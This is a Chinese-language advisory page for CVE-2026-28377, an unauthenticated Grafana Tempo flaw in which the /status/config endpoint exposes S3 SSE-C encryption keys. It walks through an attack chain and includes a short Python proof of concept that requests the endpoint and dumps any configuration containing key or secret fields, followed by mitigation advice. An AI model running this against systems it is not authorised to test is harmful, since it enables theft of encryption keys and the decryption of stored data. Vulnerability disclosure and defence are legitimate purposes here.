CVE-2026-28377 CVSS 7.5 高危

CVE-2026-28377 Grafana Tempo信息泄露漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-28377

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Grafana Tempo

漏洞概述

Grafana Tempo存在高危信息泄露漏洞，攻击者无需认证即可利用该漏洞。漏洞原因是/status/config端点未对敏感信息进行脱敏处理，导致S3 SSE-C加密密钥以明文形式暴露。成功利用后，攻击者可获取用于加密追踪数据的密钥，进而解密存储在S3中的敏感追踪数据，对数据机密性造成严重影响。

技术细节

该漏洞源于Grafana Tempo在处理配置信息请求时的逻辑缺陷。当应用启用S3服务器端加密（SSE-C）功能时，用于加密数据的客户密钥会被加载到配置中。在默认或特定配置下，/status/config端点对外暴露了包括S3配置在内的完整运行时配置。由于该接口缺乏有效的身份验证机制（PR:N）和敏感数据过滤机制，未经授权的远程攻击者可直接向该端点发送HTTP GET请求。服务器响应中会直接返回明文的S3 SSE-C加密密钥。攻击者一旦获取该密钥，即可利用AWS SDK或其他工具调用S3 API解密受保护的追踪数据，从而绕过存储层的安全防护，直接窃取敏感业务信息。此漏洞利用难度低且无需用户交互，危害性较高。

攻击链分析

STEP 1

侦察

攻击者扫描网络发现暴露的Grafana Tempo服务实例。

STEP 2

漏洞利用

攻击者无需登录，直接向/status/config端点发送HTTP GET请求。

STEP 3

信息获取

服务器返回包含明文S3 SSE-C加密密钥的配置信息。

STEP 4

数据解密

攻击者利用获取到的密钥，解密S3存储桶中加密的追踪数据，窃取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable Grafana Tempo instance
target_url = "http://target-grafana-tempo:3100/status/config"

def check_poc():
    try:
        # Send a GET request to the exposed endpoint
        # No authentication required based on CVE details
        response = requests.get(target_url, timeout=10)
        
        if response.status_code == 200:
            print("[+] Endpoint is accessible.")
            config_data = response.text
            
            # Check if S3 SSE-C key is exposed in the response
            # The key might be under fields like 's3.encryption_key' or similar
            if "s3" in config_data.lower() and ("key" in config_data.lower() or "secret" in config_data.lower()):
                print("[+] Potential S3 SSE-C Key found in response!")
                print("[+] Configuration Dump:")
                print(config_data)
                return True
            else:
                print("[-] S3 Key not found in the response output.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")
        
    return False

if __name__ == "__main__":
    check_poc()

影响范围

Grafana Tempo (具体受影响版本请参考官方公告)

防御指南

临时缓解措施

如果无法立即升级，请严格限制对Grafana Tempo实例的公网访问，并通过WAF或反向代理拦截对/status/config路径的请求。同时，轮换已暴露的S3加密密钥并重新加密存储数据。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表